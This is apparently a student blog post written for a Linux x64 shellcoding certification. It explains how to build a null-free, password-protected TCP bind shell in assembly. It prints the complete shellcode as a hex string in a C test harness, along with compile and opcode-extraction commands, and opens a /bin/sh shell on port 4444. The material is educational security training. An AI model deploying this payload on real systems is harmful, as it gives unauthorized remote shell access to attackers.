The objective here is to create a tcp_bind_shell using Assembly x64, which will ask for a passcode, and have no null bytes in it.

So, where to start? By basing our code on the C equivalent source code. Here is what a tcp_bind_shell looks like in C:

A shellcode must obey a few basic rules:

make it as short as possible, since you never know how short the memory you’ll have to inject the shellcode in;

at least, no Null bytes – there might be other bad characters, but these can be tackled with encoders that avoid using them;

no long jumps, since you won’t know the address of the code in memory when the shellcode is executing.

Regarding the reduced size, we won’t be making, as opposed to de C code, any error checks. Which makes sense, since if for some reason you can’t create a socket for example, what else would an attacker want to do?

So let’s start by creating the socket [Figure 1 – line 25].

To make a system call in linux x86_64, we use an instruction called syscall. It won’t access the interrupt descriptor table making it perform faster than the int 0x80 instruction on the x86 architecture (even though it’s also supported on the x64). This instruction will identify the system call by the number in the RAX register. The parameters are sent on RDI, RSI, RDX, R10, R8, and R9, in this exact order, and the return value will be on the RAX register.

The syscall values to put in RAX can be found on the /usr/include/x86_64-linux-gnu/asm/unistd_64.h file on the 64 bit Operating System (in my case: Ubuntu 17.04).

And python can definitely help with the constants being sent as parameters to the functions.

Given all this, the simplest code comes down to:

But if we compile this (# nasm -f elf64 bindshell.nasm -o bindshell.o) and dump the object code (objdump -M intel -d bindshell.o) we realise it has null bytes in it.

A simple way to remove those is to use a xor to zero out a register and then mov the immediate value into the lower byte.

The only issue here, is that it’s still 5 bytes long, as the original mov instruction. So, another way to remove the null bytes is to use the push/pop combination. The push supports “pushing” an immediate value with 8 bits (while also pushing the rest of the upper bytes as null bytes into the stack), which allows for removing the excess null bytes from the code.

But the advantage here is the reduced size of both instructions.

This way, we can bring an original 5 byte long instruction, to only 3 bytes, while also removing all null bytes.

But notice that, in figure 6, the mov al,0x29 instruction only has 2 bytes. This will be used across the shellcode but, it carries the burden that it can only be used (since we want this shellcode as consistent as possible) when you are sure that previous operations did not alter the zeros in the 7 upper bytes of the 8 byte register. Otherwise it will compromise the shellcode in its execution at some point. That’s why this mov al,… is not used to set up the first syscall, because we can’t be sure the shellcode will begin execution with these registers zeroed out.

Another way to bring down a mov r64, r64 from its 3 bytes, down to 2 bytes, is to use xchg instruction. But it also comes at a cost, and hence the need for a careful usage in order to keep your shellcode from crashing. It can’t obviously be used when one of the registers is RSP, and you have to be aware if both registers will have acceptable values, since the moving is on both sides.

Another reduction that can be made is using the cdq instruction. It sign-extends the RAX sign into the RDX register. So if RAX is a positive integer, it zeroes out the RDX register. The advantage being, it’s only one byte long.

So the code becomes:

Even though it looks longer (more lines), it actually is shorter after compiled.

So now let’s bind the socket to the IP address and tcp port 4444 [Figure 1 – line 36].

The RAX register contains the socket returned by the socket syscall and, because we want to send it as the first parameter to the bind syscall, we start by moving it to RDI. Then we build the sockaddr_in structure, which we’ll bind to IP 0.0.0.0 (meaning the IP on all interfaces) and TCP port 4444. This port value is written in 2 bytes, but since it’s a little endian system, we have to exchange those two bytes’ values. 4444(decimal) is equal to 0x115c (hex). So, by exchanging the two bytes, we get 0x5c11.

This structure will occupy 16 bytes, and the structure in memory will be (right at the moment when we execute mov rsi,rsp):

Because it’s a little endian system, we have to put this value backwards in the register, and that’s what’s being done with the help of some shifts, so we can avoid the zeroes.

After that, the RSP register is basically pointing to the structure, so we move it to RSI, where it will be sent as a parameter to the bind function.

Now we have the listen and accept syscalls [Figure 1 – line 42 and 48].

The listen function sets a flag in the internal socket structure marking the socket as a passive listening socket, one that you can call accept on. It opens the associated port (tcp/4444) so the socket can then start receiving connections from clients.

The accept function asks a listening socket to accept the next incoming connection and return a socket descriptor for that connection. This means it does create a new socket, the client socket, which will be put into RAX as a return value.

At this point, in a well designed, bug free, and memory conscious application, one would close the socket [Figure 1 – line 54]. But for the sake of our size restrictions, I’ll be ignoring that step, as the attacker still will be able to get the desired shell.

Now we move on to redirecting the local application’s stdin and stdout file descriptors into the client socket that connects to the listening port. The file descriptor 0 (stdin) must be duplicated, so that any input typed by the attacker in the socket can be sent to the shellcode as a normal system input would have done. And the file descriptor 1 (stdout) is being duplicated so that the output generated by the shellcode is sent back to the attacker as displayed in his or her screen.

Simply put, it would be something like this:

My only problem with this, is that it generates close to 30 bytes of opcode. But once you look closely at it, you easily detect patterns, which means we can reduce code size by using a loop:

The reason I’m calling on syscall and not worrying about the RDI and RSI registers’ integrity, is that the syscall guarantees that all registers, except RCX and R11 (and obviously the return value – RAX), are preserved during the syscall.

One small detail: I’d usually remove the third block of code from the extended version [Figure 13], because it actually duplicates the stderr (file descriptor number 2) and, if we’re being consistent with our “shortest possible” policy, I’d just remove it. But because it actually has no impact on size, on this last shortened piece of code [Figure 14], I’ll just keep it. No harm in that.

Now, the authentication code.

We start by actually reading a string from the client. As a buffer, where the inputted string will be located, I’m using the stack, and basically reserve 8 bytes for that buffer, by push‘ing the 8 byte RAX register, and then moving the RSP value to RSI, where the buffer location is. The length of the string (including the ending

) will be returned in the RAX register. This length will be used to terminate the comparison of the buffer string and the other string pushed into stack, located on the RDI register (assuming all compared bytes are equal until then).

Now, all that’s left is the /bin/sh call using execve.

The syscall value of execve is 59 (decimal). The RDI will be pointing to the string “//bin/sh”, the RSI will be pointing to an array of char*, in which the first is the memory location of the “//bin/sh” string and the second is a null pointer, and the RDX is a null pointer (no need to use any environment variables in the shellcode). This all comes down to the following:

And it’s done!

We now compile the code:

nasm -f elf64 BindShell.nasm -o BindShell.o && ld BindShell.o -o BindShell

To try the shellcode, we extract the opcode in hexadecimal format using some command line nijutsu:

for i in `objdump -d BindShell | tr ‘\t’ ‘ ‘ | tr ‘ ‘ ‘

’ | egrep ‘^[0-9a-f]{2}$’ ` ; do echo -n “\x$i” ; done

The output will be placed inside the following array in C code:

#include<stdio.h> #include<string.h> unsigned char code[] = \ “\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x52\x66\xba\x11\x5c\x48\xc1\xe2\x10\x80\xf2\x02\x52\x48\x89\xe6\xb0\x31\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x48\x97\x6a\x03\x5e\xb0\x21\xff\xce\x0f\x05\xe0\xf8\x48\x31\xff\x50\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x91\x48\xbb\x31\x32\x33\x34\x35\x36\x37\x0a\x53\x48\x89\xe7\xf3\xa6\x75\x1d\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x52\x48\x89\xe2\x57\x48\x89\xe6\x0f\x05\x90”; main(){ printf(“Shellcode Length: %d

”, (int)strlen(code)); int (*ret)() = (int(*)())code; ret(); }

Which will then be compiled without stack protection and an executable stack:

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

And finally executed:

You can find all the files on my gitlab account.

On a personal note, just want to give a huge thanks to Vivek Ramachandran and the Pentester Academy team, as I have enjoyed every second of this course since I’ve learned so many interesting things. Thank you!

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: PA-2109